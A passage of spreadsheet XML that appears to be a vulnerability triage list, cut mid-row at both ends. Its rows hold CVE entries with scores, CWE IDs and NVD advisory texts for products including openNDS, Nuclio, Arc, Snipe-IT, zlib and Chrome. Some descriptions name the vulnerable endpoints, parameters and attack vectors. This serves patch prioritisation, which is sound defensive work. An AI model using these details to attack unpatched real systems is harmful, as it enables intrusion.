      <c r="N302" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O302" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P302" s="5" t="inlineStr"/>
      <c r="Q302" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="R302" s="5" t="inlineStr">
        <is>
          <t>A cleartext transmission of sensitive information vulnerability in the NFC interface of multiple Milesight IoT device models running affected firmware versions allows an unauthenticated attacker with physical proximity to retrieve LoRaWAN ABP NwkSKey and AppSKey values and D2D keys via an NFC read operation. The exposed keys can be used to decrypt LoRaWAN traffic, forge uplink and downlink frames, submit falsified sensor data, issue supported device commands, and cause subsequent legitimate frames to be rejected.</t>
        </is>
      </c>
      <c r="S302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-29988</t>
        </is>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B303" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38820</t>
        </is>
      </c>
      <c r="D303" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E303" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F303" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G303" s="5" t="inlineStr"/>
      <c r="H303" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="I303" s="5" t="inlineStr"/>
      <c r="J303" s="5" t="inlineStr"/>
      <c r="K303" s="5" t="inlineStr"/>
      <c r="L303" s="5" t="inlineStr"/>
      <c r="M303" s="5" t="inlineStr"/>
      <c r="N303" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O303" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P303" s="5" t="inlineStr"/>
      <c r="Q303" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R303" s="5" t="inlineStr">
        <is>
          <t>openNDS before 11.0.0 is susceptible to unauthenticated OS command execution via shell command injection through the fas query parameter on the /opennds_preauth/ endpoint because of libopennds.sh.</t>
        </is>
      </c>
      <c r="S303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38820</t>
        </is>
      </c>
    </row>
    <row r="304">
      <c r="A304" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B304" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45730</t>
        </is>
      </c>
      <c r="D304" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E304" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F304" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G304" s="5" t="inlineStr"/>
      <c r="H304" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I304" s="5" t="inlineStr"/>
      <c r="J304" s="5" t="inlineStr"/>
      <c r="K304" s="5" t="inlineStr"/>
      <c r="L304" s="5" t="inlineStr"/>
      <c r="M304" s="5" t="inlineStr"/>
      <c r="N304" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O304" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P304" s="5" t="inlineStr"/>
      <c r="Q304" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R304" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. Prior to version 1.16.0, there is a vulnerability in Nuclio Dashboard's project management API, allowing any authenticated user (without membership in the target project) to bypass OPA authorization checks on write paths (PUT /api/projects/{id}, DELETE /api/projects) and modify or delete any project along with all its associated resources (functions, API gateways, etc.). This issue has been patched in version 1.16.0.</t>
        </is>
      </c>
      <c r="S304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45730</t>
        </is>
      </c>
    </row>
    <row r="305">
      <c r="A305" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B305" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48105</t>
        </is>
      </c>
      <c r="D305" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E305" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F305" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G305" s="5" t="inlineStr"/>
      <c r="H305" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I305" s="5" t="inlineStr"/>
      <c r="J305" s="5" t="inlineStr"/>
      <c r="K305" s="5" t="inlineStr"/>
      <c r="L305" s="5" t="inlineStr"/>
      <c r="M305" s="5" t="inlineStr"/>
      <c r="N305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O305" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P305" s="5" t="inlineStr"/>
      <c r="Q305" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-345, CWE-913</t>
        </is>
      </c>
      <c r="R305" s="5" t="inlineStr">
        <is>
          <t>Arc is an open, SQL-native time-series database for telemetry. Prior to version 26.06.1, Arc Enterprise's Raft FSM (`internal/cluster/raft/fsm.go:applyRegisterFile`) accepts attacker-chosen file paths in manifest-registration proposals without validating them against the configured storage backend. The only check is that the path is non-empty. There is no parent-traversal (`..`) rejection, no allowlist of legitimate prefixes, no scheme restriction (`s3://` vs local), and no length bound. This is fixed in 2026.06.1. Some workarounds are available. Restrict cluster network access to known-trusted peers via strict firewall rules, audit the cluster manifest for unexpected paths (any path not matching the configured storage backend root is suspect), and/or disable cluster mode until the fix is available.</t>
        </is>
      </c>
      <c r="S305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48105</t>
        </is>
      </c>
    </row>
    <row r="306">
      <c r="A306" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B306" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48106</t>
        </is>
      </c>
      <c r="D306" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E306" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F306" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G306" s="5" t="inlineStr"/>
      <c r="H306" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I306" s="5" t="inlineStr"/>
      <c r="J306" s="5" t="inlineStr"/>
      <c r="K306" s="5" t="inlineStr"/>
      <c r="L306" s="5" t="inlineStr"/>
      <c r="M306" s="5" t="inlineStr"/>
      <c r="N306" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O306" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P306" s="5" t="inlineStr"/>
      <c r="Q306" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-345, CWE-924</t>
        </is>
      </c>
      <c r="R306" s="5" t="inlineStr">
        <is>
          <t>Arc is an open, SQL-native time-series database for telemetry. Prior to version 26.06.1, Arc Enterprise's cluster replication receiver at `internal/cluster/replication/receiver.go` validates only the wire-format envelope (length, opcode) of inbound messages. The `MsgReplicateSync` payload itself is accepted without any application-layer authentication — no HMAC, no signature, no per-message nonce. The replication stream is protected at the transport layer by TLS / mTLS, but there is no protection against application-layer message tampering or replay once a peer is on the cluster network. This is fixed in 2026.06.1. Some workarounds are available. Restrict cluster network access to known-trusted peers via strict firewall rules, audit replication logs for unexpected `MsgReplicateSync` traffic, and/or disable cluster mode until the fix is available.</t>
        </is>
      </c>
      <c r="S306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48106</t>
        </is>
      </c>
    </row>
    <row r="307">
      <c r="A307" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B307" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53507</t>
        </is>
      </c>
      <c r="D307" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E307" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F307" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G307" s="5" t="inlineStr"/>
      <c r="H307" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I307" s="5" t="inlineStr"/>
      <c r="J307" s="5" t="inlineStr"/>
      <c r="K307" s="5" t="inlineStr"/>
      <c r="L307" s="5" t="inlineStr"/>
      <c r="M307" s="5" t="inlineStr"/>
      <c r="N307" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O307" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P307" s="5" t="inlineStr"/>
      <c r="Q307" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-200, CWE-918</t>
        </is>
      </c>
      <c r="R307" s="5" t="inlineStr">
        <is>
          <t>oasdiff-action is a GitHub Action that detects breaking changes in OpenAPI specs and post a review on every pull request. Before version 0.0.51, the oasdiff actions resolved external $refs in the OpenAPI spec by default (allow-external-refs: true). When an action runs on a pull request whose spec is attacker-controlled — most importantly fork pull requests on public repositories — a $ref in that spec is fetched/read on the runner with no interaction required, enabling SSRF and disclosure of structured files on the runner. This issue has been patched in version 0.0.51.</t>
        </is>
      </c>
      <c r="S307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53507</t>
        </is>
      </c>
    </row>
    <row r="308">
      <c r="A308" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B308" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82404</t>
        </is>
      </c>
      <c r="D308" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E308" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F308" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G308" s="5" t="inlineStr"/>
      <c r="H308" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I308" s="5" t="inlineStr"/>
      <c r="J308" s="5" t="inlineStr"/>
      <c r="K308" s="5" t="inlineStr"/>
      <c r="L308" s="5" t="inlineStr"/>
      <c r="M308" s="5" t="inlineStr"/>
      <c r="N308" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O308" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P308" s="5" t="inlineStr"/>
      <c r="Q308" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="R308" s="5" t="inlineStr">
        <is>
          <t>TOON is a compact, human-readable serialization of JSON data for LLM prompts. Prior to 2.3.1, decoding attacker-controlled TOON with a __proto__, constructor, or prototype key wrote through the object prototype chain instead of creating an own property, polluting Object.prototype for the runtime. In packages/toon/src/decode/expand.ts, the expandPaths: 'safe' path and insertPathSafe function made dotted keys such as a.__proto__.x the strongest vector, while plain nested objects, tabular rows, quoted keys, and streaming decode were also affected. The encoder also dropped own __proto__ properties and could invoke an inherited setter during normalization. Services that decode untrusted TOON could experience denial of service or, when a suitable downstream gadget is present, remote code execution. This issue is fixed in version 2.3.1.</t>
        </is>
      </c>
      <c r="S308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82404</t>
        </is>
      </c>
    </row>
    <row r="309">
      <c r="A309" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B309" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85091</t>
        </is>
      </c>
      <c r="D309" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E309" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F309" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G309" s="5" t="inlineStr"/>
      <c r="H309" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I309" s="5" t="inlineStr"/>
      <c r="J309" s="5" t="inlineStr"/>
      <c r="K309" s="5" t="inlineStr"/>
      <c r="L309" s="5" t="inlineStr"/>
      <c r="M309" s="5" t="inlineStr"/>
      <c r="N309" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O309" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P309" s="5" t="inlineStr"/>
      <c r="Q309" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R309" s="5" t="inlineStr">
        <is>
          <t>zlib versions 1.3.1.2 through 1.3.2 contain a heap buffer overflow vulnerability in the gz_vacate() function when processing non-blocking gzwrite() operations with stale external buffer pointers. Attackers can trigger the overflow by calling gzprintf() or gzvprintf() after a write stall, causing an unchecked memmove() to write beyond the internal input buffer boundary.</t>
        </is>
      </c>
      <c r="S309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85091</t>
        </is>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B310" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86750</t>
        </is>
      </c>
      <c r="D310" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E310" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F310" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G310" s="5" t="inlineStr"/>
      <c r="H310" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I310" s="5" t="inlineStr"/>
      <c r="J310" s="5" t="inlineStr"/>
      <c r="K310" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L310" s="5" t="inlineStr"/>
      <c r="M310" s="5" t="inlineStr"/>
      <c r="N310" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O310" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P310" s="5" t="inlineStr"/>
      <c r="Q310" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R310" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions &lt;= 8.6.3 (fixed in 8.7.0) do not validate company assignment authorization before persisting user records via the REST API. In Api\UsersController::store() and ::update(), the user record is filled from the request and saved before the requested company_id / company_ids[] values are filtered against the actor's permitted companies (Company::getIdsForCurrentUser()). On installs using Full Multiple Companies Support (FMCS), a non-superuser holding users.create (or users.edit on a target user) can submit company identifiers for companies outside their scope — including a mix of permitted and foreign ids — causing the account row to be committed to the database before authorization is checked. Where null_company_is_floater=1 is set, the post-hoc filter leaves an empty company pivot and the account is persisted as a "floater" with cross-company visibility, allowing creation or relocation of user accounts across tenant boundaries.</t>
        </is>
      </c>
      <c r="S310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86750</t>
        </is>
      </c>
    </row>
    <row r="311">
      <c r="A311" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B311" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86771</t>
        </is>
      </c>
      <c r="D311" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E311" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F311" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G311" s="5" t="inlineStr"/>
      <c r="H311" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I311" s="5" t="inlineStr"/>
      <c r="J311" s="5" t="inlineStr"/>
      <c r="K311" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L311" s="5" t="inlineStr"/>
      <c r="M311" s="5" t="inlineStr"/>
      <c r="N311" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O311" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P311" s="5" t="inlineStr"/>
      <c r="Q311" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R311" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 fail to HTML-escape the employee_num field in the acceptance PDF generator, allowing attackers with users.edit permission to inject img tags into TCPDF's writeHTML() function. Attackers can craft a malicious employee_num value containing an img tag with an arbitrary HTTP(S) URL to trigger server-side requests to internal services, cloud metadata endpoints, or external targets when a victim signs an asset acceptance.</t>
        </is>
      </c>
      <c r="S311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86771</t>
        </is>
      </c>
    </row>
    <row r="312">
      <c r="A312" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B312" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87034</t>
        </is>
      </c>
      <c r="D312" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E312" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F312" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G312" s="5" t="inlineStr"/>
      <c r="H312" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I312" s="5" t="inlineStr"/>
      <c r="J312" s="5" t="inlineStr"/>
      <c r="K312" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L312" s="5" t="inlineStr"/>
      <c r="M312" s="5" t="inlineStr"/>
      <c r="N312" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O312" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P312" s="5" t="inlineStr"/>
      <c r="Q312" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R312" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a SQL injection vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87034</t>
        </is>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B313" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87479</t>
        </is>
      </c>
      <c r="D313" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E313" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F313" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G313" s="5" t="inlineStr"/>
      <c r="H313" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I313" s="5" t="inlineStr"/>
      <c r="J313" s="5" t="inlineStr"/>
      <c r="K313" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L313" s="5" t="inlineStr"/>
      <c r="M313" s="5" t="inlineStr"/>
      <c r="N313" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O313" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P313" s="5" t="inlineStr"/>
      <c r="Q313" s="5" t="inlineStr">
        <is>
          <t>CWE-807</t>
        </is>
      </c>
      <c r="R313" s="5" t="inlineStr">
        <is>
          <t>Insufficient policy enforcement in Extensions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process and leveraged social engineering to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87479</t>
        </is>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B314" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87480</t>
        </is>
      </c>
      <c r="D314" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E314" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F314" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G314" s="5" t="inlineStr"/>
      <c r="H314" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I314" s="5" t="inlineStr"/>
      <c r="J314" s="5" t="inlineStr"/>
      <c r="K314" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L314" s="5" t="inlineStr"/>
      <c r="M314" s="5" t="inlineStr"/>
      <c r="N314" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O314" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P314" s="5" t="inlineStr"/>
      <c r="Q314" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R314" s="5" t="inlineStr">
        <is>
          <t>Use after free in Printing in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87480</t>
        </is>
      </c>
    </row>
    <row r="315">
      <c r="A315" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B315" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87481</t>
        </is>
      </c>
      <c r="D315" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E315" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F315" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G315" s="5" t="inlineStr"/>
      <c r="H315" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I315" s="5" t="inlineStr"/>
      <c r="J315" s="5" t="inlineStr"/>
      <c r="K315" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L315" s="5" t="inlineStr"/>
      <c r="M315" s="5" t="inlineStr"/>
      <c r="N315" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O315" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P315" s="5" t="inlineStr"/>
      <c r="Q315" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R315" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in WebView in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87481</t>
        </is>
      </c>
    </row>
    <row r="316">
      <c r="A316" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B316" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87487</t>
        </is>
      </c>
      <c r="D316" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E316" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F316" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G316" s="5" t="inlineStr"/>
      <c r="H316" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I316" s="5" t="inlineStr"/>
      <c r="J316" s="5" t="inlineStr"/>
      <c r="K316" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L316" s="5" t="inlineStr"/>
      <c r="M316" s="5" t="inlineStr"/>
      <c r="N316" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O316" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P316" s="5" t="inlineStr"/>
      <c r="Q316" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R316" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in FileSystem in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process and leveraged social engineering to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87487</t>
        </is>
      </c>
    </row>
    <row r="317">
      <c r="A317" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B317" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87506</t>
        </is>
      </c>
      <c r="D317" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E317" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F317" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G317" s="5" t="inlineStr"/>
      <c r="H317" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I317" s="5" t="inlineStr"/>
      <c r="J317" s="5" t="inlineStr"/>
      <c r="K317" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L317" s="5" t="inlineStr"/>
      <c r="M317" s="5" t="inlineStr"/>
      <c r="N317" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O317" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P317" s="5" t="inlineStr"/>
      <c r="Q317" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="R317" s="5" t="inlineStr">
        <is>
          <t>Privilege elevation in WebUI in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87506</t>
        </is>
      </c>
    </row>
    <row r="318">
      <c r="A318" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B318" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87510</t>
        </is>
      </c>
      <c r="D318" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E318" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F318" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G318" s="5" t="inlineStr"/>
      <c r="H318" s="5" t="n">
        <v>0.004</v>
      </c>
